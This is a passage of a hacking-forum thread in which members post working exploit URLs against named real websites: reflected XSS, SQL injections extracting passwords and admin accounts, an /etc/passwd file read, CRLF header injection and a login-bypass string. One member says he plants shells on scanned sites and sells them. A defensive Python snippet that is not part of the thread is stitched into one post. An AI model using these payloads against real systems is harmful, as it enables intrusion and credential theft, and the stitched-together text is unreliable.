SQLi, XSS and other vulnerabilities.

Discussion in 'Sandbox' started by Егорыч+++, 10 May 2015.

  1. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    246
    Likes Received:
    56
    Reputations:
    31
    XSS-reflected:
    Code:
    http://www.blagaya.ru/?s=1%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Ealert%28document.lastmodified%29%3C/ScRiPt%3E
     
    #121 Filipp, 10 Jul 2015
    Last edited: 10 Jul 2015
  2. frank

    frank Level 8

    Joined:
    8 May 2015
    Messages:
    200
    Likes Received:
    95
    Reputations:
    28
    Did you go at it with some scanner? Or were you fuzzing?
     
  3. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    246
    Likes Received:
    56
    Reputations:
    31
    Yes, with a scanner) Too lazy to change anything, as soon as I find something I dump it here.
     
  4. frank

    frank Level 8

    Joined:
    8 May 2015
    Messages:
    200
    Likes Received:
    95
    Reputations:
    28
    Well, I don't know. It's just my opinion of course, but what's the profit when a scanner goes through dorks and searches? I don't think it gives any experience or knowledge.
    By the way, the XSS in your example is very conditional.
    1. It's there even with the plain form <script>alert(1)</script>
    2. It will only fire in Firefox without any NoScript. Recent versions of IE and Chrome modify the request with their built-in XSS protection, and there won't be any alert.
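    As an added illustration (not part of the thread and not anyone's code from it): the reason a reflected XSS like the one above "exists even with the plain form" is that the search term is written into the page markup unescaped. Whether a given browser's XSS filter rewrites the request is a property of that browser and version (Chrome later removed its XSS Auditor altogether), so the fix belongs on the server. The snippet below shows the vulnerable reflection next to the escaped version and a cheap regression check; the URL, parameter name `s` and page template are constructed for the example.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample request: the plain payload mentioned in the post, URL-encoded.
SAMPLE_URL = "http://example.test/?s=%3Cscript%3Ealert(1)%3C/script%3E"

def search_param(url):
    """Return the decoded value of the `s` query parameter (empty string if absent)."""
    query = urlsplit(url).query
    return parse_qs(query, keep_blank_values=True).get("s", [""])[0]

def render_vulnerable(term):
    """Reflects the search term into the page as-is: the pattern behind a reflected XSS."""
    return f"<p>Search results for: {term}</p>"

def render_fixed(term):
    """Same page, but the term is HTML-escaped before it touches the markup.
    quote=True also escapes quotes, so the value is safe inside attributes as well."""
    return f"<p>Search results for: {html.escape(term, quote=True)}</p>"

def contains_script_element(markup):
    """Server-side regression check: does the rendered page contain an unescaped
    <script> start tag?  Case-insensitive, and tolerant of the whitespace tricks
    (e.g. '<ScRiPt >') that scanners use to slip past naive filters."""
    return re.search(r"<\s*script\b", markup, re.IGNORECASE) is not None

if __name__ == "__main__":
    term = search_param(SAMPLE_URL)
    print("vulnerable:", render_vulnerable(term), contains_script_element(render_vulnerable(term)))
    print("fixed:     ", render_fixed(term), contains_script_element(render_fixed(term)))
```

    The check is deliberately simple (it is a unit-test guard, not a WAF rule): the real defence is the escaping in `render_fixed`, applied at the point where untrusted data meets HTML.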
     
  5. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    129
    Likes Received:
    9
    Reputations:
    1
    And anyway, what's the fun in working RU, better go for USA
     
  6. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    246
    Likes Received:
    56
    Reputations:
    31
    The scanner put it in like that, I copied the request and posted it. And the profit is as simple as five fingers: I pick sites, scan them, upload shells to some and sell them. And where there's nothing serious, the XSS or SQLi that aren't much use I toss in here) They'll come in handy for someone here, and I get rep.
    Shells do sell; I'm not sure anyone would take a USA shell, at the very least you'd have to look for a buyer and most likely he's not reliable. Of course there's an escrow for such things, but I still stick to the classics)
     
    palec2006 likes this.
  7. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    246
    Likes Received:
    56
    Reputations:
    31
    XSS-reflected:
    Code:
    http://volia.com/ukr/subscribe/order/?pro=cine_plus_vip%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

    HTTP Parameter Pollution (Original Link):
    Code:
    http://www.moscvettorg.ru/english/collection/vse-bukety/product/otkrytka-vintazhnaya-011%26n950821%3dv972549?TAGS=vse-bukety&CODE=otkrytka-vintazhnaya-011&n950821=v972549
    
    Exploit:
    Code:
    http://www.moscvettorg.ru/english/collection/vse-bukety/product/otkrytka-vintazhnaya-011%26n950821%3dv972549

    CRLF-inj:
    Code:
    POST mh-proxy.ru/blog/action.php
    POST-DATA: id=%0d%0a%20SomeCustomInjectedHeader:injected_by_ANTICHAT
    Code:
    http://guru.ua/
    Cookie: user_set_city=%0D%0A%20SomeCustomInjectedHeader:injected_by_ANTICHAT
    Code:
    POST topclub.ua/
    POST DATA: ACT=45&business=1&comment=1&email=sample%40email.tst&form_name=%d0%97%d0%b0%d1%8f%d0%b2%d0%ba%d0%b0%20%d0%bd%d0%b0%20%d0%bf%d1%80%d0%be%d0%b4%d0%b2%d0%b8%d0%b6%d0%b5%d0%bd%d0%b8%d0%b5%20%d0%b7%d0%b0%d0%b2%d0%b5%d0%b4%d0%b5%d0%bd%d0%b8%d1%8f&name=hsmryamv&params_id=81288&phone=555-666-0606&position=1&redirect_on_duplicate=&RET=http://topclub.ua/pages/business/%26utm_campaign%3dadd_venue_sub_nav%26utm_medium%3dpages_business%26utm_source%3dtopclub_vn&return=%0d%0a%20SomeCustomInjectedHeader:injected_by_ANTICHAT&site_id=1&status=open&submit=%d0%9e%d1%82%d0%bf%d1%80%d0%b0%d0%b2%d0%b8%d1%82%d1%8c%20%d0%b7%d0%b0%d1%8f%d0%b2%d0%ba%d1%83&town=1&URI=pages/business/%26utm_campaign%3dadd_venue_sub_nav%26utm_medium%3dpages_business%26utm_source%3dtopclub_vn&XID=
     
  8. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    246
    Likes Received:
    56
    Reputations:
    31
    XSS:
    Code:
    http://lifetosex.com.ua/tags?tags=%25D0%25A1%25D0%25B5%25D0%25BA%25D1%2581%2520-%2520%25D0%259A%25D0%25BB%25D0%25B0%25D1%2581%25D1%2581%25D0%25B8%25D0%25BA%25D0%25B0%3Cvideo%3E%3Csource%20onerror%3d%22javascript:alert%281%29%22%3E&tag_list_start=36
     
    kalam_antichat likes this.
  9. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    246
    Likes Received:
    56
    Reputations:
    31
    XSS-reflected:
    Code:
    http://otsos.info/aubox.php?callback=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28%22For%20Antichat%22%29%3C/ScRiPt%3E&_=1438000881938
    XSS-reflected:
    Code:
    http://kofe-spb.ru/feedback.php?complaint=170%3C/textarea%3E%3CScRiPt%20%3Eprompt%28%22Antichat%22%29%3C/ScRiPt%3E
    XSS-reflected:
    Code:
    http://sexytales.org/stories/drama/?ecid[]=42&necid[]=42&order_by=-part_count%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28%22Antichat%22%29%3C/ScRiPt%3E&period=&per_page=
     
    #129 Filipp, 27 Jul 2015
    Last edited: 28 Jul 2015
  10. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    151
    Likes Received:
    51
    Reputations:
    116
    an interesting XSS:
    Code:
    http://www.fas.harvard.edu/antichat=%3Cscript%3Ealert%28/antichat/%29;%3C/script%3E%00
     
    Filipp, BigBear and frank like this.
  11. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    246
    Likes Received:
    56
    Reputations:
    31
    XSS-reflected:
    Code:
    http://sonnik.orakul.ua/freyd/ch%3Cvideo%3E%3Csource%20onerror%3d%22javascript:prompt%281%29%22%3E/
     
  12. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    228
    Likes Received:
    389
    Reputations:
    105
    target: http://tstu.ru
    type: AFD
    Code:
    http://tstu.ru/video/download_img.php?url=/etc/passwd

    fixed
     
    #132 joelblack, 4 Aug 2015
    Last edited: 5 Aug 2015
  13. blud_niy

    blud_niy New Member

    Joined:
    26 Jul 2015
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    SQL-inj (Blind):
    Code:
    http://www.isihac.net/news-article.php?id=-47%27+union+select+1,2,3,4,password,6,7,8+from+users+limit+0,1+--+
     
  14. private_static

    Joined:
    19 May 2015
    Messages:
    118
    Likes Received:
    76
    Reputations:
    22
    XSS
    Code:
    http://www.kadrovik.ru/prc.php?year=2015"><script>alert("xss");</script>
    SQL inject
    Code:
    http://orgpoisk.ru/region/id/-8%20union%20select%201,DATABASE%28%29,CURRENT_USER%28%29,4,5,6,7
    user:huntfishru_orpsk@localhost
    db:huntfishru_orpsk
     
  15. blud_niy

    blud_niy New Member

    Joined:
    26 Jul 2015
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    SQL inject
    Code:
    http://www.bookpourghaz.ir/post.php?id=-suHWoFO3ScI_EQUALS_'+union+select+1,2,3,user(),5,6,7,8+--+
    Code:
    http://www.seroqadir.com/read.php?id=-2323'+union+select+1,2,3,user(),5,6+--+
    SQL inject
    Code:
    http://library.phcsuphan.ac.th/webpage.contentread.php?id=-6'+union+select+1,user(),3,4,5+--+
    Code:
    http://www.malnaditimudigere.com/view_post.php?id=-2'+union+select+1,2,3,user(),5,6,7,8,9+--+
    Code:
    http://www.100devok.ru/view_post.php?id=-125'+union+select+1,2,3,4,5,user(),7,8,9,10,11,12,13,14+--+
     
    #135 blud_niy, 7 Aug 2015
    Last edited by a moderator: 7 Aug 2015
    3nvY likes this.
  16. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    228
    Likes Received:
    389
    Reputations:
    105
    yarbabin likes this.
  17. blud_niy

    blud_niy New Member

    Joined:
    26 Jul 2015
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    Site: http://www.hungatecottages.co.uk
    Vulnerability: SQL Injection
    Exploit:
    Code:
    http://www.hungatecottages.co.uk/blog-post.php?id=-55'+union+select+1,username,3,4,5,password,7,8,9+from+adminusers+limit+0,1+--+
    Site: http://www.brandnmc.com
    Vulnerability: SQL Injection
    Exploit:
    Code:
    http://www.brandnmc.com/view-product.php?id=-45'+union+select+1,2,version(),4,5,6,7,8+--+
    Site: http://agrovolyn.com
    Vulnerability: SQL Injection
    Exploit:
    Code:
    http://agrovolyn.com/news.php?id=-657'+union+select+1,version(),table_name,4,5,6,user()+from+information_schema.tables+limit+3,1+--+
    Site: http://www.siempreenplay.com
    Vulnerability: SQL Injection
    Exploit:
    Code:
    http://www.siempreenplay.com/EstudiosCientificos_post.php?id=-16'+union+select+1,2,3,4,5,table_name,7,8,9,10+from+information_schema.tables+limit+3,1+--+
    Site: http://www.fivestarhomefoods.com
    Vulnerability: SQL Injection
    Exploit:
    Code:
    http://www.fivestarhomefoods.com/view_product.php?id=-18'+union+select+1,column_name+from+information_schema.columns+where+table_name=%27users%27+limit+03,1+--+
     
    YaBtr likes this.
  18. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    228
    Likes Received:
    389
    Reputations:
    105
    target: http://www.goravia.ru/
    type: XSS Reflected
    http://www.goravia.ru/authorization/
    POST:
    Code:
    pass=adm&backurl=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2fscript%3E&member=1&user=adm
    target: https://www.aviba.ru/
    type: XSS Reflected
    https://www.aviba.ru/
    POST:
    Code:
    locate_start=1&tudaobratno=%3E%3Cscript%3Ealert%28%27hello%27%29%3B%3C%2fscript%3E&polet_class=E&f_from=%D0%9E%D1%82%D0%BA%D1%83%D0%B4%D0%B0&f_to=%D0%9A%D1%83%D0%B4%D0%B0&f_date2=%D0%9E%D0%B1%D1%80%D0%B0%D1%82%D0%BD%D0%BE&f_date1=%D0%94%D0%B0%D1%82%D0%B0

     
  19. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    246
    Likes Received:
    56
    Reputations:
    31
    Heartbleed:
    Code:
    https://avon-ekb.ru
     
    BigBear and hahanovB like this.
  20. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    228
    Likes Received:
    389
    Reputations:
    105
    target: http://www.tez-tour.com/
    type: XSS Reflected
    Code:
    http://www.tez-tour.com/captcha/index.htm?hotelTypeBetter=1&ref=%22%3E%3Cscript%3Ealert%28%27hello,tez%27%29%3B%3C%2Fscript%3E&regionId=
    target: http://www.pstour.ru
    type: SQL Injection

    Code:
    login:admin  password:' or '1'='1
     
    #140 joelblack, 13 Aug 2015
    Last edited: 13 Aug 2015
    DDShadoww, comstream and MDen1s like this.